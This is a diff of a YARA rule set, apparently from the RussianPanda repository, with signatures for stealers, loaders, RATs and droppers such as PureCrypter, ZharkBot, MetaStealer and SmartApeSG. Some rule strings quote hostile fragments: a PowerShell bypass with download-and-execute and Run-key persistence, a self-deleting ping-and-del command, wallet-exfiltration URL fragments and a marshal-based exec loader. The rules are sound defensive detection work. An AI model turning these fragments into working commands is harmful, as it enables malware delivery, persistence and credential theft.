-		hash = "bc7e489815352f360b6f0c0064e1d305db9150976c4861b19b614be0a5115f97"
-		logic_hash = "1715ef4e1914a50d8f4a0644ddfd7f9bb2b6f0ec0dfc77615dce4dd5fc943166"
+		logic_hash = "e2226f08753a3571045953363c04ec52de3c79cd0cd29e7ecb6afaf2ad573e4e"
+		score = 50
+		quality = 85
+		tags = "FILE"
+
+	strings:
+		$pattern1 = {B9 ?? ?? ?? 00 E8 ?? ?? ?? 00 ?? ?? 89 45 E8}
+		$pattern2 = {68 ?? ?? ?? 00 ?? 68 01 00 1F 00}
+		$pattern3 = {68 ?? ?? ?? 00 ?? ?? 68 01 00 1F 00 FF 15 64 ?? ?? 00}
+		$m1 = {68 ?? ?? ?? 00 ?? 00 68 01 00 1f 00 ff 15 64 ?? ?? 00}
+		$m2 = {68 ?? ?? ?? 00 ?? 68 01 00 1f 00 ff 15 64 ?? ?? 00}
+
+	condition:
+		2 of ( $pattern* ) and uint16( 0 ) == 0x5A4D and 1 of ( $m* ) and uint32( uint32( 0x3C ) ) == 0x00004550 and filesize < 200KB
+}
+rule RUSSIANPANDA_Win_Mal_Glorysprout_Stealer : FILE
+{
+	meta:
+		description = "Detects GlorySprout Stealer"
+		author = "RussianPanda"
+		id = "44c50f20-479e-5960-9ab9-97b9a17d7cbf"
+		date = "2024-03-16"
+		modified = "2024-03-16"
+		reference = "https://github.com/RussianPanda95/Yara-Rules"
+		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/1ce9c0dec191b43d51ceb34234a12e63970b252c/GlorySprout/win_mal_GlorySprout_Stealer.yar#L1-L13"
+		license_url = "N/A"
+		hash = "8996c252fc41b7ec0ec73ce814e84136be6efef898822146c25af2330f4fd04a"
+		logic_hash = "c843f7924e69c1b9fc3676178aa630319fe25605deddcd73c4905c51cc97d7eb"
 		score = 75
 		quality = 85
 		tags = "FILE"
 
 	strings:
-		$s1 = {48 8d ?? ?? ?? ??  00 48 8d}
-		$s2 = {0F B7 C8 81 E9 19 04 00 00 74 14 83 E9 09 74 0F 83 E9 01 74 0A 83 E9 1C 74 05 83 F9 04 75 08}
+		$s1 = {25 0F 00 00 80 79 05 48 83 C8 F0 40}
+		$s2 = {8B 82 A4 00 00 00 8B F9 89 06 8D 4E 0C 8B 82 A8 00 00 00 89 46 04 0F B7 92 AC 00 00 00 89 56 08}
+		$s3 = {0F B6 06 C1 E7 04 03 F8 8B C7 25 00 00 00 F0 74 0B C1 E8 18}
 
 	condition:
-		uint16( 0 ) == 0x5A4D and #s1 > 500 and all of them and filesize < 900KB
+		uint16( 0 ) == 0x5A4D and all of them and #s1 > 100
 }
-rule RUSSIANPANDA_Win_Mal_Planetstealer : FILE
+
+rule RUSSIANPANDA_Purecrypter : FILE
 {
 	meta:
-		description = "Detects PlanetStealer"
+		description = "Detects PureCrypter"
 		author = "RussianPanda"
-		id = "f912066f-4151-5f83-8d34-6bffdf9e25e5"
-		date = "2024-03-04"
-		modified = "2024-03-24"
+		id = "5670772c-ada1-55fa-b7fd-9dadd1756259"
+		date = "2024-01-09"
+		modified = "2024-01-09"
+		reference = "https://www.zscaler.com/blogs/security-research/technical-analysis-purecrypter"
+		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/1ce9c0dec191b43d51ceb34234a12e63970b252c/PureCrypter/purecrypter.yar#L3-L22"
+		license_url = "N/A"
+		hash = "566d8749e166436792dfcbb5e5514f18c9afc0e1314833ac2e3d86f37ff2030f"
+		logic_hash = "dd8592fa0b7d240d23235008601500a20e068032f6dcd6e90a38b06ac747b8af"
+		score = 75
+		quality = 83
+		tags = "FILE"
+
+	strings:
+		$s1 = {28 ?? 00 00 ?? 28 02 00 00 2B 28 ?? 00 00 (0A|06)}
+		$s2 = {73 ?? 00 00 0A}
+		$s3 = {73 ?? 00 00 06 6F ?? 00 00 06}
+		$s4 = {52 65 73 6F 75 72 63 65 4D 61 6E 61 67 65 72}
+		$s5 = {28 ?? 00 00 ?? 6F ?? 00 00 0A 28 03 00 00 2B ?? 6F ?? 00 00 0A 28 ?? 00 00 2B}
+
+	condition:
+		filesize < 6MB and 4 of ( $s* ) and dotnet.number_of_resources > 0 and dotnet.number_of_resources < 2 and dotnet.resources [ 0 ] . length > 300KB
+}
+
+rule RUSSIANPANDA_Purecrypter_Core : FILE
+{
+	meta:
+		description = "Detects PureCrypter Core payload"
+		author = "RussianPanda"
+		id = "41aaa187-0fb5-53fe-a162-8d1a4974ccc1"
+		date = "2024-01-09"
+		modified = "2024-01-09"
+		reference = "https://www.zscaler.com/blogs/security-research/technical-analysis-purecrypter"
+		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/1ce9c0dec191b43d51ceb34234a12e63970b252c/PureCrypter/purecrypter_core.yar#L3-L28"
+		license_url = "N/A"
+		hash = "e4faa7d7a098414449abffb210fd874798207ee9d27643c8088676ff429b56b7"
+		logic_hash = "8c761a98369436ffbe1379152461753778985a42ae656567018b47c71af7d866"
+		score = 75
+		quality = 81
+		tags = "FILE"
+
+	strings:
+		$s1 = {47 5A 69 70 53 74 72 65 61 6D}
+		$s2 = {41 73 73 65 6D 62 6C 79 4C 6F 61 64 65 72 00 43 6F 73 74 75 72 61}
+		$s3 = {44 65 66 6C 61 74 65 53 74 72 65 61 6D}
+		$cnct = {72 ?? ?? 00 70 28 FB 00 00 0A 72 ?? ?? 00 70 28 ?? 00 00 0A}
+		$nr1 = {7B 00 31 00 31 00 31 00 31 00 31 00 2D 00 32 00 32 00 32 00 32 00 32 00 2D 00 34 00 30 00 30 00 30 00 31 00 2D 00 30 00 30 00 30 00 30 00 31 00 7D}
+		$nr2 = {7B 00 31 00 31 00 31 00 31 00 31 00 2D 00 32 00 32 00 32 00 32 00 32 00 2D 00 34 00 30 00 30 00 30 00 31 00 2D 00 30 00 30 00 30 00 30 00 32 00 7D}
+		$nr3 = {7B 00 31 00 31 00 31 00 31 00 31 00 2D 00 32 00 32 00 32 00 32 00 32 00 2D 00 32 00 30 00 30 00 30 00 31 00 2D 00 30 00 30 00 30 00 30 00 32 00 7D}
+		$nr4 = {7B 00 31 00 31 00 31 00 31 00 31 00 2D 00 32 00 32 00 32 00 32 00 32 00 2D 00 32 00 30 00 30 00 30 00 31 00 2D 00 30 00 30 00 30 00 30 00 31 00 7D}
+
+	condition:
+		filesize < 5MB and all of ( $s* ) and dotnet.number_of_resources > 4 and dotnet.number_of_resources < 6 and 2 of ( $nr* ) and dotnet.assembly_refs [ 1 ] . name contains "protobuf-net" and #cnct > 5
+}
+rule RUSSIANPANDA_Johnwalkertexasloader_V2 : FILE
+{
+	meta:
+		description = "Detects JohnWalkerTexasLoader (JWTL)"
+		author = "RussianPanda"
+		id = "1a05245e-5ee0-5916-801b-4f7f3a573e71"
+		date = "2024-10-15"
+		modified = "2024-10-15"
 		reference = "https://github.com/RussianPanda95/Yara-Rules"
-		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/1ce9c0dec191b43d51ceb34234a12e63970b252c/PlanetStealer/win_mal_PlanetStealer.yar#L1-L14"
+		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/1ce9c0dec191b43d51ceb34234a12e63970b252c/JWTL/JohnWalkerTexasLoader_v2.yar#L1-L16"
 		license_url = "N/A"
-		logic_hash = "e1660d6fed4c48b45b40bd51fb52254c5b19ca6f1938b68f2344bde473820b86"
+		hash = "9f6bf0473f5541d84faad4c33a0bc5b1928fceb5938f2d6a7e6e02b7f0980341"
+		logic_hash = "70cbf6cf0602dc8087f4845451d13d0043872733615050161c077e3346387873"
 		score = 75
-		quality = 79
+		quality = 81
 		tags = "FILE"
 
 	strings:
-		$s1 = {48 8D 15 ?? ?? ?? 00 0F B6 34 10 0F B6 BC 04 ?? ?? 00 00 ?? ?? 40 88 ?? 04 ?? ?? 00 00 48 FF C0}
-		$s2 = {48 83 F8 ?? 7C DA}
-		$s3 = {72 75 6E 74 69 6D 65 2E 67 6F 62 75 66}
-		$s4 = {74 6F 74 61 6C 5F 77 61 6C 6C 65 74 73}
-		$s5 = {74 6F 74 61 6C 5F 63 6F 6F 6B 69 65 73}
+		$s1 = {61 00 48 00 52 00 30 00 63 00 48 00 4D 00 36 00 4C 00 79 00 39}
+		$s2 = {73 65 6E 64 6F 70 65 6E 31}
+		$s3 = {73 65 6E 64 6F 70 65 6E 32}
 
 	condition:
-		uint16( 0 ) == 0x5A4D and all of them and #s2 > 100 and #s1 > 100 and filesize < 20MB
+		uint16( 0 ) == 0x5A4D and all of them
 }
-rule RUSSIANPANDA_Smartapesg_JS_Dropper_Stage1 : FILE
+rule RUSSIANPANDA_Johnwalkertexasloader : FILE
 {
 	meta:
-		description = "Detects SmartApeSG initial JavaScript file"
+		description = "Detects JohnWalkerTexasLoader (JWTL)"
 		author = "RussianPanda"
-		id = "9513f323-c315-5ae2-92a5-c831d0a7ce2a"
-		date = "2024-01-11"
-		modified = "2024-01-11"
-		reference = "https://medium.com/walmartglobaltech/smartapesg-4605157a5b80"
-		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/1ce9c0dec191b43d51ceb34234a12e63970b252c/SmartApeSG/SmartApeSG_JS_dropper_stage1.yar#L1-L18"
+		id = "af91ab47-245b-58f2-a35a-1cb408b2229a"
+		date = "2024-10-10"
+		modified = "2024-10-10"
+		reference = "https://github.com/RussianPanda95/Yara-Rules"
+		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/1ce9c0dec191b43d51ceb34234a12e63970b252c/JWTL/JohnWalkerTexasLoader.yar#L1-L16"
 		license_url = "N/A"
-		hash = "8769d9ebcf14b24a657532cd96f9520f54aa0e799399d840285311dfebe3fb15"
-		logic_hash = "de7e4ec30c780699b46de7baf2a916fdb7331da2ee7c2d637422ea664cd03b82"
+		hash = "3784fc39dc5c0dec08ad0a49bbbb990359e313a9fa87e6842fd67ed7cc1c0baa"
+		logic_hash = "414be3219d12823639d140d132a9bbc2ca7bf8c44d0c560e4a49b76323be3f8a"
 		score = 75
-		quality = 60
+		quality = 85
 		tags = "FILE"
 
 	strings:
-		$a1 = "'GE'+'T'"
-		$a2 = "'GE','T'"
-		$s1 = "pt.Creat"
-		$s2 = "L2.ServerX"
-		$s3 = "ponseText"
-		$s4 = "MLHTTP.6.0"
-		$s5 = /\/news\.php\?([0-9]|[1-9][0-9]|100)/
+		$s1 = "?status=1&wallets=" ascii wide
+		$s2 = "/api.php" ascii wide
+		$s3 = "/api-debug.php" ascii wide
 
 	condition:
-		all of ( $s* ) and filesize < 1MB and any of ( $a* )
+		uint16( 0 ) == 0x5A4D and all of them
 }
-rule RUSSIANPANDA_Smartapesg_JS_Netsupportrat_Stage2 : FILE
+rule RUSSIANPANDA_Win_Mal_Mpxdropper : FILE
 {
 	meta:
-		description = "Detects SmartApeSG JavaScript Stage 2 retrieving NetSupportRAT"
+		description = "Detects MpxDropper"
 		author = "RussianPanda"
-		id = "2a614e11-be32-5bf1-9fd1-da224f0a644e"
-		date = "2024-01-11"
-		modified = "2024-01-12"
+		id = "26ee0a12-c727-5953-8ebb-dd8a8d772561"
+		date = "2024-03-01"
+		modified = "2024-03-01"
 		reference = "https://github.com/RussianPanda95/Yara-Rules"
-		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/1ce9c0dec191b43d51ceb34234a12e63970b252c/SmartApeSG/SmartApeSG_JS_NetSupportRAT_stage2.yar#L1-L23"
+		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/1ce9c0dec191b43d51ceb34234a12e63970b252c/MpxDropper/mal_win_MpxDropper.yar#L1-L11"
 		license_url = "N/A"
-		hash = "67d8f84b37732cf85e05b327ad6b6a9f"
-		logic_hash = "5a2afaa14d513e0a3c4e52acfb433e53a4541983a05d15318a217c14dc06453c"
+		hash = "3a44a45afbfe5fc7cdeb3723e05c4e892b079abdb7d1e8d6fc70496ef0a14d5d"
+		logic_hash = "e8d2672553c7f44e1cc177fad6596bd58b5c32a7541f91ce1207e6b21ef6e52d"
+		score = 75
+		quality = 83
+		tags = "FILE"
+
+	strings:
+		$s1 = {43 3a 5c 55 73 65 72 73 5c 6d 70 78 31 36 5c 73 6f 75 72 63 65 5c 72 65 70 6f 73}
+
+	condition:
+		uint16( 0 ) == 0x5A4D and all of them
+}
+rule RUSSIANPANDA_Ghostgambit : FILE
+{
+	meta:
+		description = "Detects GhostGambit dropper"
+		author = "RussianPanda"
+		id = "0348b9fa-59be-5f30-8ebc-f1e87cf98b07"
+		date = "2024-07-09"
+		modified = "2024-07-09"
+		reference = "https://github.com/RussianPanda95/Yara-Rules"
+		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/1ce9c0dec191b43d51ceb34234a12e63970b252c/GhostGambit/GhostGambit.yar#L1-L14"
+		license_url = "N/A"
+		hash = "2b16c68d9bafbd2ecf3634d991d7c794"
+		logic_hash = "419efbea3c347d0ec9365c0c21cccb6f229f8c42d22a2bcfdf14854e7f83aea1"
 		score = 75
 		quality = 85
 		tags = "FILE"
 
 	strings:
-		$x1 = "powershell.exe -Ex Bypass -NoP -C $"
-		$x2 = "Get-Random -Minimum -1000 -Maximum 1000"
-		$s1 = "HKCU:\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run"
-		$s2 = "=new ActiveXObject('W"
-		$s3 = "System.Net.WebClient).DownloadString($"
-		$s4 = "FromBase64String"
-		$s5 = "Start-Process -FilePath $"
+		$s1 = "/code32" ascii wide
+		$s2 = "/reg32" ascii wide
+		$s3 = "ZhuDongFangYu.exe" ascii wide
+		$s4 = "/c ping -n 4 127.0.0.1 > nul && del" ascii wide
 
 	condition:
-		filesize < 1MB and ( ( 1 of ( $x* ) and 3 of them ) or 5 of them )
+		uint16( 0 ) == 0x5A4D and all of them
 }
 rule RUSSIANPANDA_Darkgate_Autoit
 {
@@ -159579,261 +160295,267 @@ rule RUSSIANPANDA_Darkgate_Autoit
 	condition:
 		3 of ( $s* ) and $h
 }
-rule RUSSIANPANDA_Atomic_Stealer : FILE
+rule RUSSIANPANDA_Zharkbot : FILE
 {
 	meta:
-		description = "Detects Atomic Stealer targering MacOS"
+		description = "Detects ZharkBot"
 		author = "RussianPanda"
-		id = "259c5c33-0164-568f-aec4-4fe0a2c6d015"
-		date = "2024-01-13"
-		modified = "2024-01-17"
-		reference = "https://www.bleepingcomputer.com/news/security/macos-info-stealers-quickly-evolve-to-evade-xprotect-detection/"
-		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/1ce9c0dec191b43d51ceb34234a12e63970b252c/AtomicStealer/Atomic_Stealer.yar#L1-L27"
+		id = "54213d76-7e27-559d-b653-5390a0c6813c"
+		date = "2024-01-21"
+		modified = "2024-03-12"
+		reference = "https://x.com/ViriBack/status/1749184882822029564?s=20"
+		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/1ce9c0dec191b43d51ceb34234a12e63970b252c/ZharkBot/zharkbot.yar#L1-L15"
 		license_url = "N/A"
-		hash = "dd8aa38c7f06cb1c12a4d2c0927b6107"
-		logic_hash = "7601e508aeccba943b54e675212993920c984271f655e68c19efaf6d12cfebd5"
+		hash = "d53ce8c0a8a89c2e3eb080849da8b1c47eaac614248fc55d03706dd5b4e10bdd"
+		logic_hash = "ffaec6b19dd4385cd1bc156fdfde39a356367c7fba4135c48a8de62a18a78576"
 		score = 75
-		quality = 58
+		quality = 85
 		tags = "FILE"
 
 	strings:
-		$s1 = {8B 09 83 C1 (01|02|04|05|03) 39 C8 0F 85 38 00 00 00 48 8B 85}
-		$s2 = {C7 40 04 00 00 00 00 C6 40 08 00 C6 40 09 00}
-		$t1 = {80 75 D?}
-		$t2 = {0F 57 05 ?? 1B 01 00}
-		$t3 = {8A 06 34 DE 88 07 8A 46 01 34 DF 88 47 01}
-		$c1 = {28 ?? 40 39}
-		$c2 = {64 65 73 6B 77 61 6C 6C 65 74 73}
+		$s1 = {F7 EA C1 FA 04 8B C2 C1 E8 1F 03 C2 8B 55 ?? 0F BE C0 8A CA 6B C0 ?? 2A C8 80 C1}
+		$s2 = {F7 E2 C1 EA 04 0F BE C2 8B 55 ?? 8A CA 6B C0 ?? 2A C8 80 C1 ?? 30 8C 15}
 
 	condition:
-		( uint32( 0 ) == 0xfeedface or uint32( 0 ) == 0xcefaedfe or uint32( 0 ) == 0xfeedfacf or uint32( 0 ) == 0xcffaedfe or uint32( 0 ) == 0xcafebabe or uint32( 0 ) == 0xbebafeca ) and all of ( $s* ) and #s1 > 60 and #s2 > 100 or ( all of ( $t* ) and #t1 > 10 and #t2 > 5 ) or ( #c1 > 200 and $c2 )
+		uint16( 0 ) == 0x5A4D and #s1 > 3 and #s2 > 3 and filesize < 500KB
 }
-rule RUSSIANPANDA_Mal_Narniarat : FILE
+rule RUSSIANPANDA_Zharkbot_1 : FILE
 {
 	meta:
-		description = "Detects NarniaRAT from BotnetFenix campaign"
+		description = "Detects ZharkBot, version 1.2.5"
 		author = "RussianPanda"
-		id = "64c3a44b-5d75-5fec-bfc1-b66a5eb5780c"
-		date = "2024-02-02"
-		modified = "2024-02-02"
-		reference = "https://github.com/RussianPanda95/Yara-Rules"
-		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/1ce9c0dec191b43d51ceb34234a12e63970b252c/NarniaRAT/mal_NarniaRAT.yar#L1-L16"
+		id = "e20875ed-a0a1-5ac8-8758-33766c522c17"
+		date = "2024-09-02"
+		modified = "2024-09-03"
+		reference = "https://research.openanalysis.net/zharkbot/triage/x64dbg/2024/09/02/zharkbot-config.html"
+		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/1ce9c0dec191b43d51ceb34234a12e63970b252c/ZharkBot/Zharkbot.yar#L1-L15"
 		license_url = "N/A"
-		hash = "43f6c3f92a025d12de4c4f14afa5d098"
-		logic_hash = "3ee8bf6b3970c6f56ca98c87752050217e350da160a650e1724b19f340bf0230"
+		hash = "1aa0622a744ec4d28a561bac60ec5e907476587efbadfde546d2b145be4b8109"
+		logic_hash = "fded6a0c7af4fda13619778669ef619f88b43e12f12284a3c551c4fddac01024"
 		score = 75
 		quality = 85
 		tags = "FILE"
 
 	strings:
-		$s1 = "client-remote desktop"
-		$s2 = "SendDataToServer"
-		$s3 = "SendRunningApps"
-		$s4 = "SendDataToServer"
-		$s5 = "SendKeys"
-		$s6 = "_CorExeMain"
+		$s1 = "^[a-z]{8}$"
+		$s2 = "^d{6}$"
 
 	condition:
-		uint16( 0 ) == 0x5A4D and 5 of them
+		uint16( 0 ) == 0x5A4D and all of them and filesize < 500KB
 }
 
-rule RUSSIANPANDA_Illyrianstealer : FILE
+rule RUSSIANPANDA_Swaetrat
 {
 	meta:
-		description = "Detects Illyrian Stealer"
+		description = "Detects SwaetRAT"
 		author = "RussianPanda"
-		id = "2f85e87c-6883-5f41-a37c-00f9e93f61bf"
-		date = "2024-01-08"
-		modified = "2024-01-08"
+		id = "e5238ae4-7ae3-505c-a3fd-ecf6be608fac"
+		date = "2023-11-27"
+		modified = "2023-11-27"
 		reference = "https://github.com/RussianPanda95/Yara-Rules"
-		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/1ce9c0dec191b43d51ceb34234a12e63970b252c/IllyrianStealer/illyrian_stealer.yar#L2-L18"
+		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/1ce9c0dec191b43d51ceb34234a12e63970b252c/SwaetRAT/swaetrat.yar#L3-L19"
 		license_url = "N/A"
-		hash = "fae0aed6173804e8c22027cbb0c121eedd927f16ea7e2b23662dbe6e016980e8"
-		logic_hash = "2012d401d3e7ce2d4d6ea12ed01a30b7d3e18f4ed47dbf70d43bae6c328960ea"
+		logic_hash = "4dc1107a34d678c3fa0939fab7986fe744ac246400823d08b1ab6db0942821da"
 		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 
 	strings:
-		$s1 = "get_TotalPhysicalMemory"
-		$s2 = "\\b(bitcoincash)[a-zA-HJ-NP-Z0-9]{36,54}\\b" wide
-		$s3 = "[Crypto]" wide
-		$s4 = "|Black|" wide
+		$s2 = "Pong"
+		$s3 = "ReadData"
+		$s4 = "DeskDrop" wide
+		$s5 = "OfflineGet" wide
 
 	condition:
-		all of ( $s* ) and filesize < 50KB and pe.imports ( "mscoree.dll" )
+		all of ( $s* ) and pe.imports ( "mscoree.dll" )
 }
-rule RUSSIANPANDA_Aurorastealer_March_2023
+
+rule RUSSIANPANDA_Metastealer
 {
 	meta:
-		description = "Detects an unobfuscated AuroraStealer March update binary"
+		description = "Detects the old version of MetaStealer 11-2023"
 		author = "RussianPanda"
-		id = "a115de7a-bff7-5bb0-b83f-f66a29bbcf3f"
-		date = "2023-03-23"
-		modified = "2023-05-05"
+		id = "c178630b-d188-5faf-86b3-436894241d77"
+		date = "2023-11-16"
+		modified = "2023-12-30"
 		reference = "https://github.com/RussianPanda95/Yara-Rules"
-		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/1ce9c0dec191b43d51ceb34234a12e63970b252c/AuroraStealer/Aurora_March_2023.yar#L1-L15"
+		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/1ce9c0dec191b43d51ceb34234a12e63970b252c/MetaStealer/metastealer.yar#L2-L19"
 		license_url = "N/A"
-		logic_hash = "d74d2843a03e826f334ce3c5eb10cc2b43cfd832174769e5d067fb877abe13a0"
+		logic_hash = "f78b376713daf82aa2e0cbd6bf45f33d25530449fa05673c8a7c6b4c0dddca79"
 		score = 75
 		quality = 85
 		tags = ""
 
 	strings:
-		$b1 = { 48 8D 0D ?? ?? 05 00 E8 ?? ?? EF FF }
-		$ftp = "FOUND FTP"
+		$s1 = "FileScannerRule"
+		$s2 = "MSObject"
+		$s3 = "MSValue"
+		$s4 = "GetBrowsers"
+		$s5 = "Biohazard"
 
 	condition:
-		all of them
+		4 of ( $s* ) and pe.imports ( "mscoree.dll" )
 }
-rule RUSSIANPANDA_Aurorastealer_1
+rule RUSSIANPANDA_Metastealer_NET_Reactor_Packer : FILE
 {
 	meta:
-		description = "Detects the Build/Group IDs if present / detects an unobfuscated AuroraStealer binary; tested on version 22.12.2022"
+		description = "Detects NET_Reactor_packer 12-2023 used in MetaStealer"
 		author = "RussianPanda"
-		id = "1a94096f-c838-5272-856e-42efbd123a31"
-		date = "2023-02-07"
-		modified = "2023-05-05"
+		id = "5d4f62d2-6a27-53af-9b03-61daa99c10a4"
+		date = "2023-12-29"
+		modified = "2023-12-30"
 		reference = "https://github.com/RussianPanda95/Yara-Rules"
-		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/1ce9c0dec191b43d51ceb34234a12e63970b252c/AuroraStealer/AuroraStealer.yar#L1-L16"
+		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/1ce9c0dec191b43d51ceb34234a12e63970b252c/MetaStealer/metastealer_12-2023_packer.yar#L1-L16"
 		license_url = "N/A"
-		logic_hash = "7a9900266a0dfa7bf0ea91a0260a1d30bd7799a491fba87db083f4fea4115f2a"
-		score = 50
-		quality = 85
-		tags = ""
+		logic_hash = "1951d8b05f11b8a77a5bf792ad2b0ad95b8dede936ab5cd0699383468c3c97a8"
+		score = 75
+		quality = 83
+		tags = "FILE"
 
 	strings:
-		$b1 = { 48 8D 0D ?? ?? 04 00 E8 ?? ?? EF FF }
-		$go = "Go build ID"
-		$machineid = "MachineGuid"
+		$s1 = {C7 84 24 80 02 00 00 24 02 00 00 C6 44 24}
+		$s2 = "mscoree.dll" wide
+		$s3 = {43 61 76 69 6c 73 20 43 6f 72 70 2e 20 32 30 31 30}
+		$s4 = {80 F1 E7 80 F2 44 [16] 80 F1 4B 80 F2 23}
 
 	condition:
-		all of them
+		3 of ( $s* ) and filesize < 600KB
 }
-rule RUSSIANPANDA_Mal_Xred_Backdoor : FILE
+
+rule RUSSIANPANDA_Metastealer_Core_Payload
 {
 	meta:
-		description = "Detects XRed backdoor"
+		description = "Detects MetaStealer Core Payload"
 		author = "RussianPanda"
-		id = "61f5fcb8-9351-5db0-8bce-123c96d2a443"
-		date = "2024-02-09"
-		modified = "2024-02-09"
+		id = "ff5854b5-4dac-59d7-8c5a-d5b808d63483"
+		date = "2023-12-29"
+		modified = "2023-12-29"
 		reference = "https://github.com/RussianPanda95/Yara-Rules"
-		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/1ce9c0dec191b43d51ceb34234a12e63970b252c/XRed_Backdoor/mal_xred_backdoor.yar#L1-L18"
+		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/1ce9c0dec191b43d51ceb34234a12e63970b252c/MetaStealer/metastealer_core_payload_12-2023.yar#L2-L19"
 		license_url = "N/A"
-		hash = "9e1fbae3a659899dde8db18a32daa46a"
-		logic_hash = "36d138a0efade1d5c075662dc528235fe66b49879730db78c4c7290fec7420b5"
+		logic_hash = "99a319023f2c1b714a70458bd33649d6cc343b500a409af12c2eb1ce38ba4241"
 		score = 75
-		quality = 73
-		tags = "FILE"
+		quality = 85
+		tags = ""
 
 	strings:
-		$s1 = {4B 65 79 62 6F 61 72 64 20 48 6F 6F 6B 20 2D 3E 20 41 63 74 69 76 65}
-		$s2 = {54 43 50 20 43 6C 69 65 6E 74 20 2D 3E 20 41 6B 74 69 66}
-		$s3 = {55 53 42 20 48 6F 6F 6B 73 20 2D 3E 20 41 63 74 69 76 65}
-		$s4 = {45 58 45 55 52 4C 31}
-		$s5 = {49 4E 49 55 52 4C 33}
-		$s6 = {58 52 65 64 35 37}
+		$s1 = "FileScannerRule"
+		$s2 = "TreeObject"
+		$s3 = "Schema"
+		$s4 = "StringDecrypt"
+		$s5 = "AccountDetails"
 
 	condition:
-		uint16( 0 ) == 0x5A4D and 3 of them
+		4 of ( $s* ) and pe.imports ( "mscoree.dll" )
 }
-rule RUSSIANPANDA_Mal_Asuka_Stealer : FILE
+rule RUSSIANPANDA_Win_Sus_Internetshortcutfile
 {
 	meta:
-		description = "Detects AsukaStealer"
+		description = "Detects suspicious Internet Shortcut Files that are often used to retrieve malware"
 		author = "RussianPanda"
-		id = "a718be5f-dc76-5610-9237-038a9719d7e5"
-		date = "2024-02-02"
-		modified = "2024-03-18"
+		id = "88d5d33f-0342-5575-b5e4-31ac5695abf2"
+		date = "2024-02-17"
+		modified = "2024-02-17"
 		reference = "https://github.com/RussianPanda95/Yara-Rules"
-		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/1ce9c0dec191b43d51ceb34234a12e63970b252c/AsukaStealer/mal_asuka_stealer.yar#L1-L12"
+		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/1ce9c0dec191b43d51ceb34234a12e63970b252c/Techniques/win_sus_InternetShortcutFile.yar#L1-L19"
 		license_url = "N/A"
-		logic_hash = "7974e0de821ddcafd4f00b27d587108f0d80f8a231dd0db4d2be4fa6ab44fef4"
-		score = 75
-		quality = 85
-		tags = "FILE"
+		logic_hash = "9ec321ba521949fcc1db09b843913424182bfbb14eac61e92b7132d88b275ceb"
+		score = 65
+		quality = 58
+		tags = ""
 
 	strings:
-		$s1 = {32 14 3E E8 F6 81 00 00}
-		$s2 = {00 58 00 2D 00 43 00 6F 00 6E 00 66 00 69 00 67}
-		$s3 = {58 00 2D 00 49 00 6E 00 66 00 6F}
+		$s1 = "[InternetShortcut]"
+		$s2 = {55 52 4C 3D 66 69 6C 65 3A 2F 2F}
+		$a1 = ".exe"
+		$a2 = ".dll"
+		$a3 = ".js"
+		$a4 = ".msi"
+		$a5 = ".msix"
+		$a6 = ".bat"
+		$a7 = ".cmd"
 
 	condition:
-		uint16( 0 ) == 0x5A4D and all of them
+		all of ( $s* ) and any of ( $a* )
 }
-rule RUSSIANPANDA_Whitesnakestealer : FILE
+rule RUSSIANPANDA_Susp_Obf_Py_Marshal_Module : FILE
 {
 	meta:
-		description = "WhiteSnake Stealer"
+		description = "Detects Obfuscated Code Using Python Marshal Module"
 		author = "RussianPanda"
-		id = "70b69aba-5096-59a6-bb0b-44d248aecc26"
-		date = "2023-07-04"
-		modified = "2023-12-11"
-		reference = "https://russianpanda.com/2023/07/04/WhiteSnake-Stealer-Malware-Analysis/"
-		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/1ce9c0dec191b43d51ceb34234a12e63970b252c/WhiteSnake-Stealer/WhiteSnake_rc4.yar#L1-L17"
+		id = "23ed45f6-69ba-5027-ad68-4be858fc1f91"
+		date = "2024-01-16"
+		modified = "2024-01-16"
+		reference = "https://www.trendmicro.com/fr_fr/research/23/j/infection-techniques-across-supply-chains-and-codebases.html"
+		source_url = "https://github.com/RussianPanda95/Yara-Rules/blob/1ce9c0dec191b43d51ceb34234a12e63970b252c/Techniques/susp_obf_py_marshal_module.yar#L1-L18"
 		license_url = "N/A"
-		logic_hash = "24985a2c3b0d72858decd17cb2b8e485caa94c01ad72a014edc68ed4facfd71e"
-		score = 75
-		quality = 83
+		hash = "d740129ff6bdb65a324eadf4ac8de3893a54306cf2a11712a305ef6247204092"
+		logic_hash = "f150fae6d7a4642f714f4620dab65f452e5eb9cb57e9cbea46010aac3ecbb3cb"
+		score = 65
+		quality = 60
 		tags = "FILE"
 
 	strings:
-		$s1 = {73 68 69 74 2e 6a 70 67}
-		$s2 = {FE 0C ?? 00 20 00 01 00 00 3F ?? FF FF FF 20 00 00 00 00 FE 0E ?? 00 38 ?? 00 00 00 FE 0C}
-		$s3 = "qemu" wide
-		$s4 = "vbox" wide
+		$s1 = "exec(marshal.loads(zlib.decompress(b'x\\x9c"
+		$t2 = "gzip"
+		$t3 = "lzma"
+		$t4 = "bz2"
+		$t5 = "binascii"
 
 	condition:
-		all of ( $s* ) and filesize < 300KB
+		$s1 and any of ( $t* ) and filesize < 2MB
 }
-rule RUSSIANPANDA_Whitesnakestealer_1 : FILE
+rule RUSSIANPANDA_Golang_Base64_Enc : FILE
 {
 	meta:
